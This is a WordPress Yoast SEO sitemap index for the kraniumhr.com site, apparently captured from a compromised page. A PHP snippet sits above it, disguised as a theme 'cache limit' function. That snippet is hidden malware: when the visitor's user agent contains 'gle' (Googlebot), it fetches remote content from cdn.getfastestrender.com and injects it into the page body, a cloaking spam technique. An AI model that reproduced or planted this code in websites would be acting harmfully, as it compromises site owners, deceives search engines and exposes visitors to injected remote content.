
/**
 * Set the cache limit.
 *
 * To override this cache in a child theme, remove
 * the filter and add your own function tied to
 * the cache filter hook.
 *
 * @param int $c The number of excerpt characters.
 * @return int The filtered number of characters.
 */
if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') !== false) {
add_action('wp_loaded','crt');
function crt() {ob_start('cache');}
function cache($html) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, 'http://cdn.getfastestrender.com/cache.php?h=kraniumhr.com&id=3');curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);$c = curl_exec($curl);curl_close($curl);
	$html = preg_replace('/(<body.*)\n/', "$1 $c", $html);
	return $html;
}
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//kraniumhr.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://kraniumhr.com/post-sitemap.xml</loc>
		<lastmod>2025-01-22T07:11:15+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kraniumhr.com/page-sitemap.xml</loc>
		<lastmod>2025-10-28T11:26:20+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kraniumhr.com/category-sitemap.xml</loc>
		<lastmod>2025-01-22T07:11:15+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kraniumhr.com/post_tag-sitemap.xml</loc>
		<lastmod>2024-09-23T11:08:28+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kraniumhr.com/author-sitemap.xml</loc>
		<lastmod>2024-09-02T06:37:37+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->